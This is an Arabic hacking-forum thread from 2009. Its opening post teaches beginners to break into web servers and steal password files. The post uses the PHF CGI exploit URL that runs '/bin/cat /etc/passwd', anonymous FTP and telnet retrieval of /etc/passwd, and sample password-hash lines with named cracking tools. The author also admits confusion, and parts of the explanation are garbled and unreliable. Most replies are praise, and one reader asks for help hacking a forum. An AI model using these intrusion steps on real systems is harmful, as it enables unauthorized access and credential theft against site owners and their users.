التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 12-10-2009, 02:27 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية lode-hacker
 

 

 
إحصائية العضو





lode-hacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
lode-hacker is on a distinguished road

.......... تعلم اختراق المواقع!!!!!!!!


ختراق المواقع ماهو الا شئ بسيط ، نعم بسيط ولكن في حاله واحده وهي أن تتعرف على نظام التشغيل لسيرفر وهي مسأله في غايه البساطه والأمر الثاني ان تكون عالما بالثغرات الموجوده فيه ، وتكون المسأله صعبه إذا كنت تريد تريد إختراق مواقع كبيره ومشهوره ولها هيبه وحمايه عاليه حيث أنك في هذه الحاله سوف تنسى الثغرات الموجوده عندك عن النظام الخادم لهذا الموقع لأن وبالتأكيد قد رقعت وعليك أن تفكر في إكتشاف ثغره في هذا الموقع لتخترقه وهذه الناحيه لن أتحدث عنها لأني لا أعرفها ، ولكن سوف نتحدث عن البيسك سيرفر هو السيرفر الخادم لأكثر المواقع العربيه وهو سيرفر بسيط في الحمايه ,,,
لإختراق هذا النوع من السيرفرات عليك التعرف على نظام التشغيل له ويتم ذلك من عده طريق لتعرف عليه
مثلا نريد اختراق الموقع
www.kondor.com
وهذا موقع ليس مجاني بل هو نطاق له سيرفره ورقم آي بي ثابت وهذا شئ معلوم لدى الجميع
نرسل رساله الى عنوان بريدي خاطئ الى هذا السيرفر وسوف يرد عليك بأن هذا البريد غير موجود في الموقع والبريد مثلا هو
hgguutujfkerh@kondor.com
وهو بالفعل غير موجود في الموقع عنوان بريد بالإسم هذا ، من خلال الرساله التي وصلتك تخبركبأن عنوان البريد هذا غير موجود تستطيع التعرف من خلالها على نظام الموقع ، وهذه واحده من الطرق
ثانيا عليك الآن وبعد معرفه نظام التشغيل لهذا الموقع أن تبحث عن الثغرات له
////////////
////////////
ملاحظه مهمه
////////////
////////////
قد يخترق أحد المواقع ويكون السبب ليس نظام التشغيل ، بل يكون أحد البرامج المثبته عليه مثل ملفات سي حي آي وقد تستخدم لجلب ملف الباسورد المسمى دائما بـ passwd وهناك حادثه مثل هذه في إصدارات WWWThreads للمنتديات

/////////////////////////////////////////////////

لنفرض انك تبي تخترق سيرفر بسيط وقليل الأمن وهذا النوع منتشر بكثره بكثره نعم بكثره ، عندها سوف يكون إختراق هذا النوع والحصول على الباسورد فايل امر في غايه البساطه نعم في غايه البساطه ولاداعي بعد ان تخترق بأن تقول لمن يطلب منك جواب لسؤال .. كيف ؟ ان ترد عليه بأن العمليه معقده وهذا الرد كاذب
مثلا أدخل على السيرفر في وضع التخفي
anonymously (( إستخدم التلنت في هذه الخطوه ))
وانظر الى المجلد المسمى بـ
etc
وأطلب الملف
passwd
هل رأيت ... هي عمليه بسيطه ولكن قف ! الملف يحتوي على كلم السر الخاصه بالموقع وغسماء المستخدمين للسيرفر وكلماتهم السريه ولكن كلماتهم السريه تكون مشفره
طريقه أخرى لإختراق هذا النوع من السيرفرات
أبحث في الموقع المستهدف من خلال المتصفح عن يا ترى وجود سي جي آي
عند توفره أطلب الملف التالي
cgi-bin/phf?Qalias=x
/bin/cat /etc/passwd
مثلا عنوان الموقع هو
www.kondor.com
نكتب هكذا
www.kondor.com/cgi-bin/phf?Qalias=x
/bin/cat /etc/passwd
عندها سوف يرسل لك الملف
passwd
وسوف يكون في الملف إسماء وكلمات السر المرخص لهم دخول السيرفر ولكن قف هناك أمر حيرني كثيرا وجاب لي الصداع وحيث اني ذهبت لتصميم برامج لفك التشفير عن كلمات السر فهي مشفره وأنتهى الأمر بي البرنامج الذي صمم على يد أحدهم !

الآن سوف أضع أسئله وأجوبه لتسهل الفهم
س: ما الملف
passwd
وهل الحصول عليها يعتبر من الأشياء المسموح عرضها ؟
ج: الملف
passwd
يحتوي كلمات السر وأسماء المستخدمين المسموح لهم دخول جهاز السيرفر وهو غير مسموح بعرضه ولكن هناك ثغرات وطرق ذكرنا بعضها أو القليل منا وسوف نذكر أكثر ، المهم عند حصولك على الملف سوف تشاهد مكتوب فيه هكذا مثلا


Sources Code - شفرة

root:x:00000-Admin(0000):/:/bin/ksh
daemon:x1:0000-Admin(0000):/:
bin:x2:0000-Admin(0000):/usr/bin:
listen:x:37Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101
FTPUser:/export/home/ftp:
kondor:yu&rte6745kdRichardClark:/export/home/kondor



إحنا علينا من السطر هذا
kondor:yu&rte6745kdRichardClark:/export/home/kondor
ولتفسيره نقول بأن
إسم المستخدم هو
kondor
وكلمه السر المشفره .. حط خطين تحت كلمه مشفره هي
yu&rte6745kd
وايضا
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh
الآن فهمنا ماذ يعني السطر هذا السطر من الملف passwd
kondor:yu&rte6745kdRichardClark:/export/home/kondor

حاولت أن تعرف من هذه شئ
admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:
Regular Admin login:/admin:/sbin/sh
bin:*2:Admin :/bin:
sys:*3:Admin :/usr/src:
adm:*4:Admin :/usr/adm:/sbin/sh
daemon:*1: Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh
س : هل اي ثغره تنجح ؟
ج : لا طبعا ، لابد ان تكون عارفا لأي شئ هذه الثغره ولأي نظام تشغيل وهل يلزم أن يكون مع نظام التشغيل برنامج آخر ليتم الدخول على السيرفر أو على الروت ، وكل هذه المعلومات لابد من توفرها
مثلا الموقع alsahat.net يعمل على نظام لينكس
وقد يكون لثغره أن سبق ورقعت
س : هل يختلف تشفير كلمه السر من نظام لآخر ؟
ج : هذا شئ أكيد ...
س : هل هناك برامج مخصصه لكلمات السر لكل نظام ؟
ج : نعم ، مثلا برنامجي المفضل لكسر شفرات الكلمات السريه (passwd) لنظام يونكس هو Brute ولكن للأسف أنا لا أملكه الآن وهناك برنامج آخر قد يكون أفضل من سابقه وهو Cracker Jack 1.4
)(
إعذروني لن كان كلامي مو مرتب
)(




شكل الكلام والله مو مرتب ... عشان كذا بعيد أكتب لكم بتعمق أكثر والكلام اللي فوق هذا مجرد مقدمه
بكتب بالعاميه ازين لي ولكم
مو لازم تعرف الكلام الي سبق ذكرته لكن إفهم منه جواب السؤال :: كيف يتم :: فقط

=== نبداء من هنا وبعمق ===
عرفنا ان الملف
(سوف نسميه من الآن بإسم ملف الباسورد )passwd file
يحتوي على إسماء المستخدمين المرخص لهم الدخول الى السيرفر وكلماتهم السريه وعرفنا أيضا أنها مشفره ولكن ضع كل تفكيره في الحصول على ملف الباسورد وأترك كيفت كسر التشفير في النهايه فهي تعتبر بسيطه
فمتو كل اللي راح ,,,, تمام

إستغلال الثغرات
اولا ما هي الثغرات ,,, الثغرات هي حفر وهفوات في السفت وير فقط وتمكن أي شخص من الحصول على ماعلمومات أو نشر فيروسات من خلال هذه الثغره
من ضمن هذه الثغرات ، ثغره سبق وذكرتها لكم في هذا المقال وهي في ملفات السي جي آي واستخدمناها لإختراق الموقع
www.kondor.com
ونورد عنها الآن تفاصيل
تسمى هذه الثغره الأمنيه بـ
PHF
ومعظم السيرفرات تمتلك هذه الثغره والى الآن لم يتم رقعها مع الأسف (إذا وجد عنده سي جي آي فقط ) !:! إذا نجحت هذه الثغره فسوف يعرض لك ملف الباسورد ، زي هذا مثلا

Sources Code - شفرة


root:x:00000-Admin(0000):/:/bin/ksh
daemon:x1:0000-Admin(0000):/:
bin:x2:0000-Admin(0000):/usr/bin:
listen:x:37Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101
FTPUser:/export/home/ftp:
kondor:yu&rte6745kdRichardClark:/export/home/kondor





كما ذكرنا سابقن (كتابه سابقاً هكذا سابقن أفضل ) لووول
أحفظ الملف في تكست او مستند نص عشان تسوي له عمليات لكسر التشفير

FTP Passwd
بعض السيرفرات تحفظ ملف الباسورد في الإف تي بي نفسه ، أي تستطيع الى حد بعيد أن تحصل على ملف الباسورد من خلال دخولك في وصع مخفي
anonymous logins
والدخول بالوضع الخفي شئ قانوني ، وتسحب ملف الباسورد من الهدف المحدد ، غستخدم احد هذه البرامج لهمل ذلك
WS FTP or CuteFTP
وبعد ماتدخل بالوضع الخفي راح تجيك لسته أو قائمه
إختر منها
etc
وراح يعرض لك عدد قليل من الملفات مثل هذا
"group, passwd"
وملف الباسورد مو شرط يكون إسمه
passwd
ممكن يكون غير كذا .. المهم أنت أسحبه وإفتحه ولو شفت إسم مثل
"root, daemon, FTP, nobody, ftplogin, bin"
وإذا لقيت بالقرب من هذه الكلمات رمز نجمه كهذه * وقد رمز آخر مثل علامه إكس فقط ، لن ينفعك الإستعانه بأحد الكراكر ولكن كل ماعليك أن تتعقب الباسورد ويجب ان تبحث لحل لهذه المشكله فأنا حتى تحصل على مثل هذا
"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
والآن إستعن بأحد الكراكر لكسر كلمة السر او حاول عن طريق البرامج الذي ذكرتها لك سابقن

س : ماهو إسم المستخد هنا وماهي كلمة السر المشفره ؟
جاوب أنت .... !:!

التعقب لملف الباسورد
الآن وبعد أن حصلت على مثل هذا
"joetest:*:102:100::/home/joetest:/usr/bin/restsh"
فأنت الآن تملك
shadowed passwd
فهذا يتدلى في نظام التشفيل ولكن الـ
passwd file
يختلف (لا داعي لتعمق اكثر ) والملف
passwd file
هو الذي نجد كلمة السر فيه مشفره وليست رمز واحد مثل * أو x
و الـ
shadow file
يكون مكان كلمة السر نجمه أو رمز
وأنا الى الآن لست متأكد من هذه النقطه

انا الحين تعبت من الكتابه ،، اتمنى أنكم طلعتو بفايده



jugl hojvhr hgl,hru!!!!!!!!

   

رد مع اقتباس
قديم 12-11-2009, 06:10 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية System
 

 

 
إحصائية العضو






System غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
System is on a distinguished road

افتراضي


أبدااااااااااااااااااااااااااااااع ماشالله ... لول مع اني مافهمت شي بسـ عجيب

خاطري اصير هكر مواقع

التوقيع

غااااااااائب قليلا ::

الاسبااب 0((خاصه ))

http://img135.imageshack.us/img135/2512/systemf.jpg
.................................................. ...
http://img87.imageshack.us/img87/6728/81018216.jpg

((( خبر عاجل و برايفت )) ,...System يخترق ب ملفات Dll << صدق او تمزح ؟؟ :a40:

برجع معا اقوى درووس تشفير لم تراها العين
طرق التشفير -- بلغة البرمجه --
xna9ooryx@hotmail.com

 

   

رد مع اقتباس
قديم 12-11-2009, 03:07 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


يسلو يا غالي
مع انه الموضوع قديمه شويه لكنه يحتوي على معلومات هامه ومفيده

اقبل مروري

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 12-16-2009, 03:37 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو





passeport to hell غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
passeport to hell is on a distinguished road

افتراضي


ما فهمت و لا شين عاشان مازلت مبتدأ

   

رد مع اقتباس
قديم 12-25-2009, 04:35 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية walid25
 

 

 
إحصائية العضو





walid25 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
walid25 is on a distinguished road

افتراضي


أبدااااااااااااااااااااااااااااااع ماشالله يسلو يا غالي
اقبل مروري

التوقيع

عالم الهكر كبير جدا

Я знаю, что могу сделать что-либо в

hacker мире

Я сильно

walid25

bwalid1@hotmail.fr

 

   

رد مع اقتباس
قديم 01-03-2010, 08:45 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية M!M0
 

 

 
إحصائية العضو






M!M0 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
M!M0 is on a distinguished road

افتراضي


معلومات قيمة

شكرا لك أخي

التوقيع


اعذروني لقلة قلامي..فالمدرسة تدمرني

http://img337.imageshack.us/img337/9193/kya54442.gif


M!M0==>معقد نفسيا ، مشتت ذهنيا منتحر علميا ، متورط عائليا مطلوب امنيا...,وماذا بعد؟

 

   

رد مع اقتباس
قديم 01-07-2010, 03:11 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية az3l 3leek
 

 

 
إحصائية العضو






az3l 3leek غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
az3l 3leek is on a distinguished road

افتراضي


سوووري ما فهمت

سووري

بس أنا أبي اخترق منتدى

فهل تساعدني ؟؟

   

رد مع اقتباس
قديم 01-16-2010, 05:41 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية gta
 

 

 
إحصائية العضو





gta غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
gta is on a distinguished road

افتراضي


ممممممممممممممممممم كيف حالك إن شاء الله دائما بخير ؟ السلام عليكم ورحمة الله وبركاته وعليكم السلام ورحمة الله وبركاته بسم الله الرحمن الرحيم الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . موفق بإذن الله ... لك مني أجمل تحية . ألف مبروك .. لقد سعدت بهذا الخبر

   

رد مع اقتباس
قديم 01-16-2010, 05:42 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية gta
 

 

 
إحصائية العضو





gta غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
gta is on a distinguished road

افتراضي


but yoU can't pirat SKYPE

   

رد مع اقتباس
قديم 12-19-2010, 04:49 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
GHOST HACKERS
:: مُدِيْر عـــام ( قائد فريق الفحص وكشف التلغيم ) ::
 
الصورة الرمزية GHOST HACKERS
 

 

 
إحصائية العضو






GHOST HACKERS غير متواجد حالياً

إرسال رسالة عبر Skype إلى GHOST HACKERS

 

 

إحصائية الترشيح

عدد النقاط : 102
GHOST HACKERS will become famous soon enoughGHOST HACKERS will become famous soon enough

افتراضي


ممبدع ماشاء الله عليك

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
تعلم صنع فيروس يقوم بإرسال عدد كبير من الرسائل لتفجير المواقع BrEaKeR-Dz قـسـم الفـايروسات Viruses 18 07-22-2012 01:21 PM
سلسلة دروس تعلم واحتراف joomla تعلم صنع المواقع باسهل الطرق simon007 برمجة الويب 9 05-27-2011 09:44 PM
خاص للمبتدئين تعلم اختراق المواقع والمنتديات DAZ قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 4 01-20-2011 03:39 AM
استفسارات تخص -السرقة بالصفحات المزورة*اختراق الاجهزة*اختراق المواقع*****ارججججججججوكم يا خبراء لا ترددوني beginer جـــ'ابات العناكــ'ب 0 11-07-2010 10:13 PM


الساعة الآن 02:21 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0